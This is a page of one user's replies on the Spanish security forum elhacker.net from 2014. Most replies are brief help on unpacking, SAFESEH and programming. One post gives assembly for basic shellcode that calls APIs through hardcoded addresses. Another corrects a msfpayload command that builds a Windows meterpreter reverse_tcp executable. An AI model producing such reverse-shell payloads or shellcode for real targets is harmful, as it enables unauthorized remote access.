elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 [404] 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 ... 630
4031  Programación / Ingeniería Inversa / Re: [AYUDA] Desempaquetar Dongle con OllyDBG en: 25 Julio 2014, 01:22 am
Hola!

Aqui encontraras mucha info sobre el desempacado de dongles.

Saludos!
4032  Seguridad Informática / Análisis y Diseño de Malware / Re: problema en la creacion de shellcode basica en: 23 Julio 2014, 22:11 pm
Otra cosa que puedes hacer (para no usar el deltaoffset) es:

Código
  1. .386
  2. .model flat,stdcall
  3. option casemap:none
  4. .code
  5.  
  6. inicio:    
  7. call delta        ;provoca el PUSH de la direccion del string que sigue
  8. db "User32.dll",0
  9. delta:
  10. mov eax,77272864h ;direccion de loadlibraryA varia
  11. call eax    
  12. push 0  
  13. push 0    
  14. push 0    
  15. push 0        
  16. mov eax,778eea71h ;//direccion de MessageBoxA    varia
  17. call eax
  18. retn
  19. end inicio
  20.  

Para solucionar el problema de las DLLs, sólo necesitas LoadLibrary y GetProcAddress. Luego, usando el método que haz puesto o el que te dejo aquí; haces LoadLibrary y GetProcAddress y ya tienes la direccion real de la API.

Hay múltiples ejemplos de llamadas a API con código pic en internet.

Saludos!
4033  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Pie del foro en: 23 Julio 2014, 01:06 am
La veo salir, pero cuando no estoy logueado...
4034  Seguridad Informática / Bugs y Exploits / Re: ¿Dónde apunta el SEH handler con SAFESEH? en: 21 Julio 2014, 23:15 pm
Hasta donde entiendo, cuando compilas con SAFESEH, el compilador crea una tabla con todos los SEH chains que has declarado en tu codigo.

Luego, si ocurre una excepcion que tenga SEH, el SO comprobara que la direccion del SEH Handler al momento de la excepcion, este en la tabla creada. Si no esta, entonces no ejecutara el SEH handler.

Esto previene los exploits que sobreescriben el SEH handler.

Saludos!

EDIT: La tabla que te menciono, esta en tu exe.
4035  Foros Generales / Foro Libre / Re: nuevo miembrp en: 21 Julio 2014, 07:34 am
Hola!

Aqui tienes el post donde puedes presentarte.

Saludos! (y bienvenido al foro!)
4036  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:54 pm
Creo qué no me has entendido amigo

Lo que quiero es generar ese payload desde la consola de metasploit que tengo instalado en windows,saludos

El comando del link anterior, te permite crear un ejecutable, desde la consola, ya sea en linux o windows.

La explicacion del articulo es muy simple...

Saludos!
4037  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:32 pm
Fijate esto.

Saludos!
4038  Sistemas Operativos / Windows / Re: windows-metasploit-payload en: 20 Julio 2014, 22:20 pm
Tu codigo:

Código:
msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX > /ejemplo/lol.exe

como creo que deberia ser:

Código:
msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX x > /ejemplo/lol.exe

Saludos!
4039  Programación / Programación Visual Basic / Re: Ayuda con resolución de formulario en VB 6.0 en: 17 Julio 2014, 15:55 pm
Hola!

Esto ya se ha respondido antes. Probaste usando el buscador del foro?

Saludos!
4040  Comunicaciones / Redes / Re: necesito ayuda sobre pinguear en: 17 Julio 2014, 01:10 am
Hola!

Esto te puede ayudar.

Saludos!
Páginas: 1 ... 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 [404] 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 ... 630
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines